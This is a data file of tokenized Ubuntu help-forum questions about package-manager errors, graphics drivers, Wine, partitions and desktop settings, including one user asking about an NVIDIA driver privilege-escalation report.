171038	broken package manager ? the suggested `` apt-get -f install '' is failing !	i do n't really know what happened ... i clicked `` install updates '' in the update manager window , it failed , and next thing i know i ca n't apt-get install any packages , it just suggests i try apt-get -f install , which fails with the following message . doug @ doug-lubuntu : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libcupsimage2 : i386 the following packages will be upgraded : libcupsimage2 : i386 1 upgraded , 0 newly installed , 0 to remove and 30 not upgraded . 5 not fully installed or removed . need to get 0 b/52.5 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libcupsimage2 : i386 ( -- configure ) : libcupsimage2 : i386 1.5.3-0ubuntu1 can not be configured because libcupsimage2 : amd64 is in a different version ( 1.5.3-0ubuntu2 ) dpkg : error processing libcupsimage2 ( -- configure ) : libcupsimage2 : amd64 1.5.3-0ubuntu2 can not be configured because libcupsimage2 : i386 is in a different version ( 1.5.3-0ubuntu1 ) no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of ia32-libs-multiarch : i386 : ia32-libs-multiarch : i386 depends on libcupsimage2 ; however : package libcupsimage2 : i386 is not configured yet . dpkg : error processing ia32-libs-multiarch : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ia32-libs : ia32-libs depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch is not installed . package ia32-libs-multiarch : i386 is not configured yet . dpkg : error processing ia32-libs ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of skype : skype depends on ia32-libs ; however : package ia32-libs is not configured yet . dpkg : error processing skype ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : libcupsimage2 : i386 libcupsimage2 ia32-libs-multiarch : i386 ia32-libs skype e : sub-process /usr/bin/dpkg returned an error code ( 1 ) doug @ doug-lubuntu : ~ $ can someone out there help me get my package manager working ?
171055	how to access the windows program installed uisng wine ?	how to access the windows programs installed using wine on ubuntu 12.04. dash did not show as well as there was no desktop icon . any ideas
171069	why are there popular ideas on brainstorm that developers have n't implemented ?	when joining ubuntu community i found brainstorm not only a wonderful idea but great in execution to . now after watching the site for 3 releases i wonder if its only fluff that 's shown to new users . maybe to get them excited about ubuntu ? do developers pay much attention to brainstorm ? how many votes in the positive does an idea require before being seriously looked at ? ( some ideas have tens , close to hundred ( s ) and they are still not moved to the upstream development area )
171073	'important security update ' for firefox and flash plugin , but the update can not be selected	[ this question has been updated as i now have the same problem with firefox in addition to flash plugin ] the update manager ( on ubuntu 12.04 , 64bit ) shows an 'important security update ' for flashplugin-installer : i386 , firefox , and firefox-globalmenu . the update is unticked , and can not be selected , and therefore can not be updated ( i can update other packages without problems ) . actually the flashplugin-installer package does not appear to be installed on my computer ( judging from the software centre ) . i ca n't remember how i installed flash , probably directly from the adobe website . the updater asks me if i want to do a partial upgrade . when running sudo apt-get update & & sudo apt-get upgrade from terminal , i get the following : the following packages have been kept back : firefox firefox-globalmenu flashplugin-installer : i386
171074	my nvidia geforce 610 in asus a43sd does n't recognize on ubuntu 12.04	i was try to install vga card because it does n't recognize on `` addtional driver '' so i try install it manualy with following this steps : download driver from www.nvidia.org adjust the type you have nvidia . the results are usually berekstension driver . run copy of driver is in your home folder , then open terminal and type sudo gedit / etc / modprobe.d / blacklist.conf then add the sequence at the end blacklist.conf : blacklist nouveau then save . then go to the command line mode , by pressing ctrl + alt + f1 , then do login once the login is successful , then typing : sudo stop lightdm ( to temporarily turn off xserver ) sudo apt-get - purge remove xserver-xorg-video-nouveau ( pruging nouveau ) sudo update-initramfs-u ( then restart ) steps 2-4 serves nouveau remove kernel that contains the default driver of ubuntu , to install the nvidia driver . then login as normal ( mode de ( desktop environment / gui ) ) , re-press the ctrl + alt + f1 and log in command line , turn off xserver such as step 4. then install the nvidia driver . installation steps in a way , find the directory where the downloaded nvidia drivers are . then typing in the command line : sudo sh ./nvidia-linux-x86-295.59.run ( adjust the driver file name ) window will then appear on the command line to install and configure the nvidia driver . but at least , my screen become small for early resolution of 1366 x 768 to 640 x 480 vga card and still not read the `` additional drivers '' if my vga card ca n't read on `` additional driver '' , i ca n't to access compiz manager hope you can help me
171077	how does ubuntu know that i have a folder icon customized ?	in windows there 's hidden a configuration file : if deleted , it 's like it was never customized . i do n't see anything when customizing in ubuntu , where does it store the configuration file that says what icon to display ?
171078	suggestions for ide with code auto-completion for web development ( lamp )	i am looking for an editor ( ide ) for developing php web applications . i would need it to handle html , css , javascript and php at the minimum . what i am looking for is code auto-completion functionality within the software . like for example as i type mysql_c , it should bring up mysql_connect ( ) with the arguments and syntax . i come from windows background , and i was using codelobster php for programming , it was just perfect until i switched over to linux , only to find that it is not available in linux . please suggest similar ides that support auto-completion .
171083	how can i tell the update manager to never update my nvidia drivers ?	i had set my nvidia , and it is working . my cuda compiler in ubuntu is now working . now , i do not want sotware center update my nvidia at all ... , how can i force software center not update my nvidia graphix card at all ? if somebody know how to remove automatic update from software center please let know .
171085	what amazon ec2 machine state does a stop hook in juju correspond to ?	there are 2 parts to the question does the destroy-service command results in the stop hook being called for juju ? in case of amazon ec2 machine instances what state ( terminate or stop ) are they put into when the stop hook completes its execution ?
171086	remove or hide magazines from the software center	i just started using ubuntu again ( after using max osx for 2 years ) , and the one thing that bothers be about it are the magazines spamming the software center . is it possible to totally remove them from the listings ?
171087	in juju , what command to use for accessing environment settings from within a hook script ?	my specific case is for getting the amazon ec2 authentication information stored in the environments.yaml . i am aware of the get-constraints command available in recent juju builds . can this be used to access this information ?
171090	is there any good font editor ?	there is any good font editor for ubuntu ? like high-logic font editor for win . i tried doubletype , but not worked very well , and really outdated .
171097	ubuntu 12.04 gnome classic : white background for systray icons	all systray icons ( not indicators ) are with white background . how can i change it to panel 's color ?
171098	how do i change a document 's extension / file extension / file format ?	in windows there 's an option to view extensions for known file types . when i enable that option i see all the files with their respective extension ; for example an mp3 music file is : name.mp3 if i rename it to name.txt , then the default program to view the file would be text editor . how do i rename a file 's extension in ubuntu ? i want to create the file : autorun.inf in windows i just create a new text document .txt ( enable the view of extensions ) and rename it to .inf , but in ubuntu that does n't work . so how can i do that in ubuntu ?
171100	can i install to a usb key , but place the swap partition on my hard drive ?	is is possible to do a normal install to a usb key , but place swap partition on internal hard drive ? my lenovo laptop has 4 primary partitions including 2 recovery . i want to do the above so that i do n't wear out my usb .
171114	how do i permanently avoid an update ?	i have noted after installing the first huge block of updates you get after a fresh installation , unity 3d would disappear leaving me only 2d support . so , not exactly knowing what did that depend on , i chose to deselect all unity-2d updates from the list . the problem is , every time new updates are introduced , that ones i 'm desperately trying to avoid are always showing up . that 's for me annoying , as i have to manually deselect them all the times , and dangerous , as every time i risk installing them and find everything screwed up . now , is there a way to tell update manager to forget about those packages unless i expressly request them ? or at least to make him show them already deselected among all others ? is it sufficiently trying to hold them ? i mean , some may be new packages , instead of already existing packages that are being brought to a newer version . if someone can tell me also which packages the 2d depend on , so that i can install other maybe useful packages , that 's even better . the ones i deselected are : libunity-2d-private0 , unity-2d , unity-2d-common , unity-2d-panel , unity-2d-shell , unity-2d-spread .
171117	ripping dvd to play in xbox 360	i am trying to rip a dvd to be playable on my xbox 360 . i used handbrake 0.9.8 normal & high profile presets with no avail . although mpeg-4 & h.264 are supported by the xbox , it wo n't play files made by handbrake in those formats . is there a way to encode files using ffmpeg , mencoder or any other tool and have them work in the xbox 360 ?
171119	how to control kde ( 4.9.0 ) plasma widgets from command line ?	i can not delete `` window menubar '' widget from panel and `` facebook '' widget from `` search and launch '' desktop bottom . and i do n't want to delete all my settings , can i delete these widgets somewhere in config files or with some commands ?
171122	shell script to run commands to all subdirectories	i am making a script to simplify my daily tasks . everyday , i have to grep for a few things inside a company server . it was okay , however , now , they have segregated each object into sub directories . i am looking for a solution in which my existing shell script will execute repeatedly into each sub directory inside a certain directory . how do i do this ? i am quite new to ubuntu and still learning the ropes . here 's my script : # ! /bin/bash # fetch start time of uut grep -i `` 01_node_setup '' his_file | tail -1 > > /home/xtee/sst-logs.out # check if sysconfig.out exists if [ -f sysconfig.out ] ; then grep -a 1 `` drive model '' sysconfig.out | tail -1 > > /home/xtee/sst-logs.out else grep -m 1 `` pair0 dimm0 '' node0/trans_file_prev/*setupsys* | tail -1 > > /home/xtee/sst-logs.out fi basically i want to run this script to execute on all the existing sub directories of a certain directory . what do i do ? thanks !
171126	how do i update a third party app that does not have root permission	i installed intellij idea using ubuntu software centre , but now idea 's build-in update manager notifies me that there is an update available , but the app does not have the permission to update it . if i click ok to idea 's build in update manager , then the update downloads , but i get an error : `` there are some confilecs found in the installation '' . looking at the detail , you can see that it 's trying to install a whole bunch of jar files , but that it results in `` access denied '' failures . i can update the app as root , using sudo idea.sh , but then it only update 's the version started as root , so when i run the app as my local user again , then it 's back at the old version . is there a way to run an app as local user , but at the same time give it root permission ? this should solve the problem ?
171128	kernel metapackages ( linux-generic vs linux-image-generic )	the package hierarchy for ubuntu kernel images looks like this : linux-generic -- > linux-image-generic -- > linux-image-2.6.38-8-generic . both linux-generic and linux-image-generic are metapackages . i understand the purpose of having one kernel metapackage ( to handle upgrades and multiple kernel versions ) , but what is the point in the second level ? it seems that linux-generic only depends on linux-image-generic , so surely it is redundant ?
171129	after changing user , ca n't go back to previous session	here is what is happening in details , in my ubuntu 10.04 lts desktop installation : i log in as user `` a '' without terminating the session , i switch to user `` b '' now , i 've done what i wanted as user `` b '' , and finish its section at this point , user `` a '' session is not available anymore ; it is lost ; no green checkmark indicating there is an open session for user `` a '' anymore ; if i enter the password , instead of the interrupted session , i have a fresh new one the previous and correct behaviour was that , after finishing user `` b '' session , i was able to resume the user `` a '' session , from where it was . at some point of time which i do n't know - probably some installation and/or upgrade - this strange and annoying behaviour started . before , i could let anyone use the computer if i left it while working . now , i ca n't anymore . i need to act as a `` police '' , watching and caring and worrying that nobody else uses the computer when i 'm not for a while . i want my peace back ! : - ) does anyone have a clue and recommends something for me to try ? thank you .
171137	how do i create one user without key authentication ?	i 've completed the following steps : i have configured ubuntu server with key authentication and it is working fine . i have disabled password authentication for key authentication to work . the server is always accessed via remote terminals or putty . now all user accounts are able to log in with the authentication key and pass phrase , but now i want to create only one new user without key authentication . so how should i go about it ? on the other hand , this should not hamper other users who are using key authentication .
171138	how to access multiple skype accounts in ubuntu 12.04	around 2 days ago , i was able to access multiple skype accounts . but now i do not know what has happened and i am unable to access multiple skype accounts in the way i did before . is there any way to fix the issue and access multiple skype accounts ?
171141	bumblebee problem with external monitor on hdmi : program does n't fill whole screen	i have a dell l501x computer supporting optimus ; my nvidia chip is connected to the hdmi port . the driver is nvidia-current ; bumblebee is installed and working . my pc resolution is set to 1366x768 . i managed to set up an external monitor simply by removing the edid line in the xorg.conf.nvidia file and starting programs with display=:8 optirun program . via optirun nvidia-settings -c :8 i checked that the external screen ( a tv monitor ) is detected with its native resolution , which is 1920x1080 . so far so good . the problem now is that the program , e.g . firefox , fills only the middle and upper left half of the screen . the rest remains black . changing the resolution down to 1280 etc . the screen is filled quite better . so what is the problem , what can i do ?
171143	how to prevent my screen from either dimming or the screen-lock starting when watching youtube ?	my screen brightness used to dim after a few seconds to preserve battery . this is default in ubuntu 12.04 . however when watching video it should not dim . this works correctly when i watch videos using native applications like vlc . with in-browser video , however , the screen is not prevented from dimming . this is very annoying as you have to move your cursor every 10 seconds or so . i used to use mac osx where i had the same dimming settings and flash videos were taken into account correctly . anyone an idea how you can make youtube prevent your screen from dimming ?
171144	update manager wo n't install from un-authenticated sources	my update manager shows updates available . when i click on install updates it shows the following and does not update . the action would require the installation of packages from not authenticated sources . in details : accountsservice cups cups-bsd cups-client cups-common cups-ppdc empathy empathy-common libaccountsservice0 libcups2 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsmime1 libcupsppdc1 nautilus-sendto-empathy scribus-trunk how to get updates ?
171146	color calibration not working in 10.04.4 with gnome color manager	calibrating my monitors , or loading a different icc profile , does not affect the color representation on my monitor . system setup : pc : md8822 dual core . os : ubuntu 10.04.4 desktop 64 bits . calibration software : gnome color manager . calibration device : huey pro . monitor 1 : eizo flexscan l887 . monitor 2 : prolite e1900s . gpu geforce 7650 gs . driver : nvidia 302.17 . i have the nvidia driver configured in twin view mode . when i change the profile in the color manager , the monitor shows some flickering lines for about half a second , but the colors do not change . the color profiles are definitely different . i just installed 10.04.4 and choose the 302.17 driver as this gave me the best results for my dual head set up . any help would be highly appreciated ! !
171147	how do i test virtual hosts in apache before i buy the domains ?	is it possible to setup an apache virtual host without a domain name , i just want to use my ip to test my website until i get a domain name . examples in apache documenation only seem to have domain name aliases like so < virtualhost *:80 > servername www.otherdomain.tld documentroot /www/otherdomain < /virtualhost >
171152	blackberry playbook mediasync with ubuntu ? how it works ?	i will sync my files on my blackberry playbook with my 12.04 desktop . playbook will connect and show connection screen but ubuntu ca n't mount this . if i connect my bb smartphone , i can connect and sync files or move videos , music and others . but i need this function on my tablet for documents , ebooks and other stuff . can someone tell a simply way ( or create a ppa for this ) ? by the way : sync files via bluetooth will not work . i can connect via bt but not searching or sending files .
171153	x freeze after closing the lid asus-k52f ubuntu 12.04	x freezes sometimes , after closing the lid on an asus-k52f laptop with ubuntu 12.04. and i have to reboot it , wich is kinda anoying .
171156	how to prevent ubuntu one for windows from automatically signing on to my account ?	i have an ubuntu one account setup in 11.10 . i 've sync files and it works perfectly . however , at work , i can only use windows os , so i 've installed u1 for windows . the computer at work is a shared computer , thus i am trying to find ways how to keep my sync files safe from unauthorized access . there are two issues that i 'd like to fix : first : u1 automatically starts and connect upon boot . i have already unchecked the `` connect automatically when the computer starts '' option from the settings tab and rebooted several times , still u1 automatically starts on system boot and appears at the system try . this means that whoever logs into the computer can just click u1 from the system tray and access my files . how do i resolve this ? second : u1 automatically signs on to my account . even with the first issue resolved , my files are still vulnerable since u1 can be launched with just one click from the start menu which then automatically signs into my account without asking for a password ( shown below ) . is there a way to force u1 to prompt for a password ? i know i could just setup a password to the sync folders in the windows explorer but what would prevent someone from accessing my files ( those which i choose not to sync ) ? since the u1 window automatically signs into my account , someone could just easily tick the `` syn locally ? '' box and access the files . or i 'd be better off accessing the files from the browser - downloading them and uploading ( again ) - than syncing them ?
171157	xdebug 2.2.1 installed but not working with cgi	i 've installed ( via pecl ) xdebug . it is installed ( as phpinfo ( ) output indicates ) , but it does n't seems to work with cgi ( with cli it works ) . i 've restarted apache , without result . any ideas ? some config details ( as parsed by http : //xdebug.org/wizard.php ) xdebug installed : 2.2.1 server api : apache 2.0 handler windows : no zend server : no php version : 5.3.10-1 zend api nr : 220090626 php api nr : 20090626 debug build : no thread safe build : no configuration file path : /etc/php5/apache2 configuration file : /etc/php5/apache2/php.ini extensions directory : /usr/lib/php5/20090626+lfs
171160	how can i split the standard ubuntu terminal ?	i would like to have several terminals in the same window . i know i can have tabs , but with them we ca n't see two terminals at a time . i know terminator is another terminal able to do this , but i really like the standard terminal . is it possible ?
171163	how to recover a deleted ntfs partition with data	i am on ubuntu 12.04 64-bits i accidentally deleted a ntfs 255 gb partition using gparted , and yes it contains lots of important data . upon realizing the deletion i have n't yet created any file-system on it . so it still shows unallocated . i tried testdisk , but it shows entire partitions created from the beginning . this sdb is my secondary drive with xubuntu and kubuntu on it . and that 255 gb ntfs partition was cross platform storage drive . i am currently in sda with ubuntu and win7 in dual boot , which enables me to use it as safe recovery option rather then live usb drive . first , should i allocate it to ? file-system for better recovery . second , i really need to recover data from this drive so please give me possible suggestions and proven methods of data recovery . third , does testdisk requires deleted partition to be allocated for its recovery . i am currently trying the answer seen here http : //askubuntu.com/a/24951/63025 with testdisk scanning for partition second time , hoping to recover it . it looks a duplicate but i ca n't confirm if the op got it right . since my first doubt is to allocate it or not . if any clarification required please do comment , i will add it . edit : testdisk deeper search results . the following partitions ca n't be recovered : partition start end size in sectors > hpfs - ntfs 22241 107 11 55592 3 27 535777280 fat32 lba 274460 158 19 460576 228 16 2989957948 ntfs , 274 gb / 255 gib & for fat32 lba 1530 gb / 1425 gib
171166	how to turn on laptop 's functional keys ?	i have installed ubuntu 12.04 but key fn+f2 fn+f3 and etc does n't work like in windows 7 . i have laptop asus zenbook ux32vd . how can i enable those keys ?
171171	need a way to restrict maximum screen size due to monitor hardware issues	basically the lower part of my laptop screen has fizzled out ( its just dead static , as you can see here . so i 'm trying to figure out a way to automatically restrict my window sizes , full-screen and otherwise , to avoid that region . i 've hit a brick wall so far . running ubuntu 12.04 . s.o.s amigos .
171174	get maximum bandwidth of a network adapter	i would like to know how do i obtain the max bandwidth of my network adapter ? i can read it when i open my network settings panel ( eg , wired connected - 100mb/s ) , but i would to obtain this value diagrammatically . wireless is not needed . thanks in advance , pedro
171180	'/etc/hosts ' , http links are redirecting , but https links are not redirecting	i edited /etc/hosts file and entered below information : 127.0.0.1 test.com //working 127.0.0.1 https : //test.com //not working . from the above info , http : //test.com is redirecting to 127.0.0.1 , but https : //test.com is not redirecting to 127.0.0.1 . is there any way i can do that ?
171184	compiz cube not working with 12.04 in gnome classic or unity	i have a fresh install of ubuntu 12.04 on my dell studio xps ( specs at end of post ) with nvidia-current installed as the proprietary drivers and i 'm mainly using gnome classic but this issue does happen in untiy too . according to the workspace switcher in the corner i have 4 workspaces in a 2x2 format , when i click on another workspace it only switches between 2 . selecting workspace 3 on the launcher switches to 1 and 4 switches to 2 . i have the compiz cube enabled and when rotating workspaces it is just a plane with a dekstop on each face rather than the cube . if i go into the compiz settings and have a look at the number of workspaces it only shows 1 and if i increase them to 4 the workspace switcher changes to a 4x1 arrangement and selecting any of the other 3 not just changes to that workspace but without a desktop environment or any windows ( including conky ) . if it hit ctrl+alt+t for terminal it then jumps back to workspace 1 and opens a terminal . i have been using my laptop with another monitor configured in twinview but i have also tried disabling this and using one monitor and the issue still occurs . in want to configure it to have 4 workspaces which display properly in the compiz cube and it would be nice to have this working across both monitors . [ it would be wonderful to have 4 workspaces for each monitor and a separate cube and switcher for each one giving 8 total but i think that 's just greedy : p ] laptop spec i7-2630qm 12gb ram nvidia gefore 555m ( 3d display so optimus is disabled ignores the intel hd3000 ) 17 '' screen 1920x1080 second monitor acer p223w 1680x1050
171187	i 'm about to upgrade to 12.04 from 11.10 . what should i backup before hand ?	just like the title says . i have already backed up my home folder . is there anything in /etc/ or /usr/share i should back up ? thanks
171194	copying files from ipod classic to clementine library	today i installed clementine on my pc with ubuntu 12.04 installed on it . this application can recognize my ipod good , but there is a problem when i want to copy files to library ; i do n't have any option to do this.in rhythmbox when i drag music category from device subcategory to library folder , everything done great . is there anyway to do it in clementine ?
171195	usb wireless is not detected when installing 12.04	when i installed ubuntu 12.04 on a dell inspiron e1505 , the usb is not detected . during installation , the system asked if i wanted to connect to wireless usb `` real tec '' but not my network . i believe the `` real tec '' to be the usb . this is a new usb which i purchased from think penguin . now that the install is complete , wireless networking is not an option on the menu .
171197	how to recover encrypted home data with live cd ?	last night i closed my computer and when i try to login to my account i get rejected even though my password is correct . i tried to reset the pw but nothing so in second place i try to recover my data i put a live cd but when i try to access to my partition via live cd i have two files one named access-your-private-data and readme . i tried to recover my data with the ecryptfs method but i could n't it give nothing same problem . please help me because i have all my work there i did n't even encrypted my home i just found it that way . p.s . i think that this problem was originally because i do n't have any space left in my hd , and i have been getting a message that said that a few days ago .
171198	`` system reserved '' windows partition showed on ubuntu 12.04 . not installed using wubi	windows `` system reserved '' can be mounted on ubuntu '' system reserved '' windows partition showed on nauilus ubuntu 12.04 . no any other problems . i've sda1 system reserved sda2 windows partition sda3 ubuntu partition sda4 extended partition sda5 ntfs part sda6 ntfs part this is my fstab . # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda3 during installation uuid=917d1cad-a914-47ee-a9e2-4e3d2025285a / ext2 errors=remount-ro 0 1 /dev/sda2 /media/sda2 ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sda5 /media/sda5 ntfs nls=iso8859-1 , ro , umask=000 0 0 /dev/sda6 /media/sda6 ntfs nls=iso8859-1 , ro , umask=000 0 0 pls hlp ... the output when df -h used is filesystem size used avail use % mounted on /dev/sda3 30g 3.6g 25g 13 % / udev 983m 4.0k 983m 1 % /dev tmpfs 396m 904k 395m 1 % /run none 5.0m 4.0k 5.0m 1 % /run/lock none 990m 684k 989m 1 % /run/shm /dev/sda2 30g 8.5g 22g 29 % /media/sda2 /dev/sda5 100g 89m 100g 1 % /media/sda5 /dev/sda6 139g 91m 138g 1 % /media/sda6
171202	where is my imported windows account data ?	i 've just successfully installed my brand new ubuntu 12.04 lts 64bit , dual booting with windows 7 . during the installation , i choose to import my existing windows account but now i 'm unable to find the account data ( documents , images etc.. ) in my new ubuntu . home , documents , images ... folders seem to be empty.. why that ? thanks a lot , riccardo
171205	getting `` 'file ' is different from the same file on the system '' when i attempt to update through synaptic	encountered an error while updating through synaptic manager . subsequent updates gave the error at the bottom of the output . i 'm a noob so any help is appreciated . al @ al : ~ $ sudo apt-get -f upgrade reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following new packages will be installed : libjack-jackd2-0 : i386 the following packages have been kept back : linux-headers-generic skype 0 upgraded , 1 newly installed , 0 to remove and 2 not upgraded . need to get 0 b/202 kb of archives . after this operation , 493 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 310056 files and directories currently installed . ) unpacking libjack-jackd2-0 : i386 ( from ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
171209	my /boot partition hit 100 % and now i ca n't upgrade . ca n't remove old kernels to make room	my first issue was when i tried to apt-get update/upgrade . on upgrade i get the following error : you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.2.0-27-generic but it is not installed e : unmet dependencies . try using -f. i tried running apt-get install -f and this was the output ( after saying yes on prompt ) ( reading database ... 186183 files and directories currently installed . ) unpacking linux-image-3.2.0-27-generic ( from ... /linux-image-3.2.0-27-generic_3.2.0-27.43_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-27-generic_3.2.0-27.43_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/system.map-3.2.0-27-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-27-generic /boot/vmlinuz-3.2.0-27-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-27-generic /boot/vmlinuz-3.2.0-27-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-27-generic_3.2.0-27.43_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried running apt-get autoremove and it gives me the same error as apt-get upgrade when i run df , i get this for /boot : /dev/sda1 233191 230297 0 100 % /boot so , i read elsewhere that i should try to purge old kernals . i checked for what kernals i had with dpkg -l linux-image-\* | grep ^ii it returns ii linux-image-2.6.38-13-server 2.6.38-13.52 linux kernel image for version 2.6.38 on x86_64 ii linux-image-3.0.0-13-server 3.0.0-13.22 linux kernel image for version 3.0.0 on x86_64 ii linux-image-3.0.0-14-server 3.0.0-14.23 linux kernel image for version 3.0.0 on x86_64 ii linux-image-3.0.0-15-server 3.0.0-15.26 linux kernel image for version 3.0.0 on x86_64 ii linux-image-3.0.0-16-server 3.0.0-16.29 linux kernel image for version 3.0.0 on x86_64 ii linux-image-3.0.0-17-server 3.0.0-17.30 linux kernel image for version 3.0.0 on x86_64 ii linux-image-3.2.0-24-generic 3.2.0-24.39 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-25-generic 3.2.0-25.40 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-26-generic 3.2.0-26.41 linux kernel image for version 3.2.0 on 64 bit x86 smp so , when i try to remove the oldest with this : sudo apt-get purge linux-image-2.6.38-13-server i get the error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.2.0-27-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i 'm out of ideas . how can i free up / extend boot without messing up my installation ? thanks for the help .
171210	do i need to backup my swap partition ?	the thing i wonder why i am not able to see swap area of ubuntu in clonezilla . i want to create an image of my ubuntu . however , i can not find the swap partition of ubuntu to image it . thanks .
171218	convert .doc files to .pdf file using imagemagick	i want to convert .doc files into .pdf format using php image library imagemagick . when i used convert filename.doc filename.pdf command in terminal to convert file to .pdf format i got the error convert : no decode delegate for this image format `attendance.doc ' @ error/constitute.c/readimage/532 . convert : missing an image filename `attendance.pdf ' @ error/convert.c/convertimagecommand/3011 . any help and suggestions will be appreciable .
171220	change the behavior of the capslock key	to be honest i 'm not sure or what i want is possible but it would be very nice if this can be done . i changed the behavior of the capslock to act like a ctrl key . now it 's just an ctrl key only positioned at an easier to reach place , which is great , butâś it would even be nicer if i could press the capslock key followed by a second key press . i mean for example : capslock ( ctrl ) â v instead of the normal capslock ( ctrl ) + v. i guess what i 'm looking for is a somewhat similar behavior as the g ( go ) combinations in vim or gmail . does anyone have an idea how this can be accomplished ?
171222	3+ monitors , nvidia + intel graphics	i have seen lots of different posts on this issue , but i can not figure out what to do . i hope we can collect the available information in one place , so that they can be useful for others . is it possible to have multiple ( 3+ ) monitors running on two different graphics cards ? i have 1x nvidia geforce gtx 550 with 2 dvi ports and 1x intel integrated graphics , with 2 dvi ports . i understand that they would be running on different instances of x servers . is that correct ? could someone point me in the right direction to start ? on windows it 's so simple , there is no additional thing to do other than going in display preferences and activating all 3+ monitors . they can even be laid out alternating one monitor from one graphics card with another monitor from the other card .
171230	nvidia linux driver hack gives you root access ?	launchpad bug link : https : //bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-updates/+bug/1032344 apparently there is a security vulnerability with the current nvidia drivers that gives the attacker root access ? excerpt from phoronix article : phoronix news link : http : //www.phoronix.com/scan.php ? page=news_item & px=mte1mtk '' david airlie published this nvidia hack today to a mailing list ( the exploit is attached there as a single c file ) . airlie is n't the original author of this hack but rather the code was passed onto him by an anonymous user ( s ) . the code was forwarded to nvidia corp more than one month ago , but the official nvidia linux proprietary driver developers have yet to act on the vulnerability . as a result , it was decided to release this to the public . now maybe nvidia will take care of it since this 760 lines of c code can provide root access to a system running the nvidia binary blob . first up i did n't write this but i have executed it and it did work here , i was given this anonymously , it has been sent to nvidia over a month ago with no reply or advisory and the original author wishes to remain anonymous but would like to have the exploit published at this time , so i said i 'd post it for them . it basically abuses the fact that the /dev/nvidia0 device accept changes to the vga window and moves the window around until it can read/write to somewhere useful in physical ram , then it just does an priv escalation by writing directly to kernel memory . '' questions : which nvidia proprietary driver versions does this affect ? should we update to a specific version to avoid this ? are nvidia 295.49 x86_64 drivers safe ? is ubuntu 12.04 lts 3.2.0-27-generic # 43-ubuntu immune from this ? launchpad.net link : https : //answers.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-updates/+question/204865
171233	what can i do to make unity more memory-efficient ?	i realy love unity , but the most of the time i have to use gnome-shell because i only have 1.5 gb of ram and when i work i have to use all these apps : fogger , firefox , compiz efects , empathy , gwibber and some lenses . what can i do for get better efficiency of my memory usage without sacriface many features of unity ?
171235	ubuntu vm can not find new network cards	after copying the virtual hard disk of a vm i made to a new machine , ubuntu no longer recognises the network cards and spews out errors like : failed to bring up eth0 ... .. no such device i 'm guessing that this is to do with the change in mac address ( since the type of network card has remained the same ) . does anyone know how to fix this ? edit : ifconfig only shows the loopback interface , no others . edit 2 : ip addr shows they 've moved to eth2 and eth3 ? ? ?
171236	winetricks fails to find program files directory	i installed a fresh copy of ubuntu 12 desktop then : installed wine from the ubuntu software center . installed winetricks from the ubuntu software center . when i type the following commands in the terminal : sudo winetricks dotnet40 i get this error message : wine cmd.exe /c echo ' % programfiles % ' returned empty string if i try the command without sudo winetricks dotnet40 the output is as follows executing w_do_call dotnet40 executing load_dotnet40 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- dotnet40 does not yet fully work or install on wine . caveat emptor . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- executing mkdir -p /home/vectoruser/.cache/winetricks/dotnet40 mkdir : can not create directory `/home/vectoruser/.cache/winetricks/dotnet40 ' : permission denied -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- note : command 'mkdir -p /home/vectoruser/.cache/winetricks/dotnet40 ' returned status 1 . aborting . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- my current user is vectoruser which i use to logon to ubuntu the output of ls -ld /home/vectoruser /home/vectoruser/.cache /home/vectoruser/.cache/winetricks gives : drwxr-xr-x 32 vectoruser vectoruser 4096 aug 2 19:26 /home/vectoruser drwx -- -- -- 19 vectoruser vectoruser 4096 aug 2 19:25 /home/vectoruser/.cache drwxr-xr-x 2 root root 4096 aug 